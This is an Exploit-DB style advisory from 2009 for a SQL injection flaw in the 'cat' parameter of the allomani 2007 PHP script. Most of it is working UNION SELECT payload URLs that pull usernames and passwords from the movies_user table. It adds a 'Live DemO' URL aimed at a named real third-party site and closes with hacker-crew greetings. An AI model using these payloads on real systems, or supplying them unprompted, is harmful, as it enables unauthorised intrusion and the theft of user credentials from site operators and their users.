allomani 2007 - 'cat' SQL Injection

EDB-ID:

9532

CVE:

N/A


Platform:

PHP

Published:

2009-08-26

==================

NaMe: allomani 2007  <= SQL Injection Vulnerability
Author : NeX HackEr
Contact: c2l@hotmail.com

==================

Script site : http://allomani.com

==================

ExplOiT:

 UserName

http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT username,2,3 from movies_user

 Password


http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT password,2,3 from movies_user

 :) 

==================

Live DemO:

http://www.leeen.net/index.php?action=browse&cat=43 and 1=0 UNION AlL SELECT username,2,3 from movies_user



+========================================================+
|                                                                                   
| Greetz.: ~ alMaFiA ~ RmZ AlJnooP ~ GaBsH ~                                          
|               And All Friends!!!!                      
+========================================================+

# milw0rm.com [2009-08-26]